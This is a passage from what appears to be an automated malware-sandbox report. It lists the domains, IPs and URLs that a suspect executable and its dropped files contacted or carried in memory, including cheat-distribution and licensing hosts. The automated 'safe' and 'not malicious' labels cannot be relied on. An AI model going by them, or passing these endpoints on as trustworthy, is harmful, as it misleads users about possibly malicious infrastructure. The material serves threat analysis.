      http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97K0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=Tgd0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/C:0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97d0%Avira URL Cloudsafe
      http://cqbox.applinzi.com/time.phphttp://cqbox.sinaapp.com/time.phphttp://cqbox.appchizi.com/time.ph0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=fd0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinastorage.cnYwY0%Avira URL Cloudsafe
      http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.phpupl0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinastorage.cn&PZ)0%Avira URL Cloudsafe
      http://cqbox.applinzi.com/time.php0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinastorage.com5w%0%Avira URL Cloudsafe
      http://182.254.116.116/-0%Avira URL Cloudsafe
      http://www.ksfm2.com0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=BUS0%Avira URL Cloudsafe
      http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&10%Avira URL Cloudsafe
      https://waigua.lanzn.com/b015nykdcss0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=cd0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.comC:0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinacloud.net?dn=sinastorage.cn0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/d497ea0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=sinastorage.com183.60.95.2210%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.cnMwm0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.cn-w0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/f0%Avira URL Cloudsafe
      http://crl.ver)0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=sinacloud.net.de50%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/style.css)0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinacloud.net5w%0%Avira URL Cloudsafe
      https://www.90yundian.com/liebiao/8115018243F766D70%Avira URL Cloudsafe
      http://www.GeeM2.com0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinacloud.net~p0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/Z0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/tyle.css1Yd0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/r0%Avira URL Cloudsafe
      http://www.Haom6.comhttp://www.GeeM2.comWemade0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=dd0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/q0%Avira URL Cloudsafe
      http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&0%Avira URL Cloudsafe
      http://www.m6dlq.com/0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97-0%Avira URL Cloudsafe
      http://182.254.116.116/d0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/style.cssR0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/style.css0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=sinastorage.cn49.7.37.970%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinastorage.cnyp0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinastorage.com&0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.comwuj0%Avira URL Cloudsafe
      http://114.114.114.114/c0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinacloud.net0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinastorage.comstio0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinacloud.net-w0%Avira URL Cloudsafe
      http://shoufeifz.qijianfz.com/y0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97?0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=sinastorage.cn0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=sinacloud.net.net0%Avira URL Cloudsafe
      http://www.GameM2.com0%Avira URL Cloudsafe
      https://waigua.lanzn.com/b015nykd0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.com0%Avira URL Cloudsafe
      http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.php0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.cniw0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinacloud.netm0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn0%Avira URL Cloudsafe
      http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.cnLMEMXH;0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.com&0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinacloud.net887010%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinastorage.cn0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=cd0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinastorage.cn&BZ?0%Avira URL Cloudsafe
      http://www.8pkw.com:5566/kss_api/io.php0%Avira URL Cloudsafe
      http://www.m6dlq.com/PEC20%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=sinastorage.com14$0%Avira URL Cloudsafe
      http://www.8pkw.com:5566/kss_api/api.php_ksreg_http://www2.8pkw.com/kss_api/api.php_ksreg_13_ksreg_10%Avira URL Cloudsafe
      https://waigua.lanzn.com/b015nykdK0%Avira URL Cloudsafe
      http://119.29.29)0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=sinacloud.net0%Avira URL Cloudsafe
      http://119.29.29.29/d?dn=sinastorage.comn0%Avira URL Cloudsafe
      http://114.114.114.114/d?dn=sinastorage.comfZ0%Avira URL Cloudsafe
      http://plugin.config.hyocr.com:8080/hyver.php?ver=%d&user=%s0%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinacloud.netmAE30%Avira URL Cloudsafe
      http://182.254.116.116/d?dn=sinacloud.netn40%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      sinacloud.net
      		27.221.16.149
      		truefalse
        		high
        sinastorage.cn
        		183.60.95.221
        		truefalse
          		high
          www.8pkw.com
          		43.154.56.182
          		truefalse
            		unknown
            shoufeifz.qijianfz.com
            		119.28.131.242
            		truefalse
              		unknown
              www.wshifen.com
              		103.235.46.96
              		truefalse
                		high
                sinastorage.com
                		123.126.45.208
                		truefalse
                  		high
                  so.seos-lb.com
                  		104.192.110.226
                  		truefalse
                    		high
                    www.sogou.com
                    		43.153.236.147
                    		truefalse
                      		high
                      ww1.sinaimg.cn.w.alikunlun.com
                      		163.181.92.233
                      		truefalse
                        		high
                        www.iqiyi.com
                        		unknown
                        		unknownfalse
                          		high
                          www.sina.com.cn
                          		unknown
                          		unknownfalse
                            		high
                            www.so.com
                            		unknown
                            		unknownfalse
                              		high
                              www.baidu.com
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.sina.com.cn/false
                                  		high
                                  http://sinastorage.cn/question/s6paiesfalse
                                    		high
                                    http://sinastorage.cn/question/data.txtfalse
                                      		high
                                      http://shoufeifz.qijianfz.com/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://shoufeifz.qijianfz.com/style.cssfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://sinastorage.cn/question/l6tbasser.zipfalse
                                        		high
                                        http://sinacloud.net/question/data.txtfalse
                                          		high
                                          http://sinastorage.com/question/o6saettr.zipfalse
                                            		high
                                            http://sinastorage.com/question/c6tmassafalse
                                              		high
                                              http://sinacloud.net/question/2024-12-05/21_22false
                                                		high
                                                http://sinastorage.com/question/2024-12-05/21_22false
                                                  		high

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97KD74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://cqbox.applinzi.com/time.phpVIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://114.114.114.114/d?dn=fdD74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://sinacloud.net/question/VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                    		high
                                                    http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97dD74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2842244916.000000000563A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://114.114.114.114/d?dn=sinastorage.cn&PZ)D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://shoufeifz.qijianfz.com/C:D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D44000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007D44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://119.29.29.29/d?dn=TgdD74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://114.114.114.114/d?dn=sinastorage.cnYwYD74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://cqbox.applinzi.com/time.phphttp://cqbox.sinaapp.com/time.phphttp://cqbox.appchizi.com/time.phVIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://sinacloud.net/question/http://sinastorage.cn/question/http://sinastorage.com/question/http://VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                      		high
                                                      http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.phpuplB81BTTTQM.dll.2.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://114.114.114.114/d?dn=sinastorage.com5w%D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://182.254.116.116/-D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ksfm2.comD74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://182.254.116.116/d?dn=sinacloud.net?dn=sinastorage.cnD74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://waigua.lanzn.com/b015nykdcssD74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&1D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C492000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://119.29.29.29/d?dn=BUSD74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219757684.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://182.254.116.116/d?dn=cdD74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://shoufeifz.qijianfz.com/d497eaD74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://182.254.116.116/d?dn=sinastorage.comC:D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://182.254.116.116/d?dn=sinastorage.cnMwmD74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://119.29.29.29/d?dn=sinastorage.com183.60.95.221D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://ip.qq.com/v1-dll-api.jsdama.comD74384FB8D2C9.exe, 00000002.00000003.2095066577.0000000005635000.00000004.00000020.00020000.00000000.sdmp, 9683JE76z.dll.2.drfalse
                                                        		high
                                                        http://shoufeifz.qijianfz.com/fD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://182.254.116.116/d?dn=sinastorage.cn-wD74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://crl.ver)svchost.exe, 00000003.00000002.3741348324.000001E17F8CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.90yundian.com/liebiao/8115018243F766D7D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4568816305.0000000006058000.00000004.00000800.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007D4D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, DV95YAA3.htm.2.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://119.29.29.29/d?dn=sinacloud.net.de5D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://182.254.116.116/d?dn=sinacloud.net5w%D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://shoufeifz.qijianfz.com/style.css)D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.GeeM2.comD74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://shoufeifz.qijianfz.com/ZD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://114.114.114.114/d?dn=sinacloud.net~pD74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://shoufeifz.qijianfz.com/tyle.css1YdD74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://shoufeifz.qijianfz.com/rD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.Haom6.comhttp://www.GeeM2.comWemadeD74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://shoufeifz.qijianfz.com/qD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4568816305.0000000005FFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.sohu.com/VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                          		high
                                                          http://182.254.116.116/d?dn=ddD74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://sinastorage.com/question/VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                            		high
                                                            http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C450000.00000004.00001000.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C457000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.m6dlq.com/D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97-D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://182.254.116.116/dD74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://shoufeifz.qijianfz.com/style.cssRD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97D74384FB8D2C9.exe, 00000002.00000002.4567640195.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://114.114.114.114/d?dn=sinastorage.com&D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://114.114.114.114/d?dn=sinastorage.cnypD74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://182.254.116.116/d?dn=sinacloud.netD74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EBC4000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://114.114.114.114/cD74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://182.254.116.116/d?dn=sinastorage.comwujD74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.iqiyi.com/D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://114.114.114.114/d?dn=sinastorage.comstioD74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://182.254.116.116/d?dn=sinacloud.net-wD74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://shoufeifz.qijianfz.com/yD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97?D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://119.29.29.29/d?dn=VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219757684.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.GameM2.comD74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://119.29.29.29/d?dn=sinastorage.cnD74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://119.29.29.29/d?dn=sinacloud.net.netD74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://182.254.116.116/d?dn=sinastorage.comD74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.eyuyan.comD5AESTNHE.dll.2.drfalse
                                                                		high
                                                                https://waigua.lanzn.com/b015nykdD74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, DV95YAA3.htm.2.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.phpB81BTTTQM.dll.2.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://182.254.116.116/d?dn=sinastorage.cniwD74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
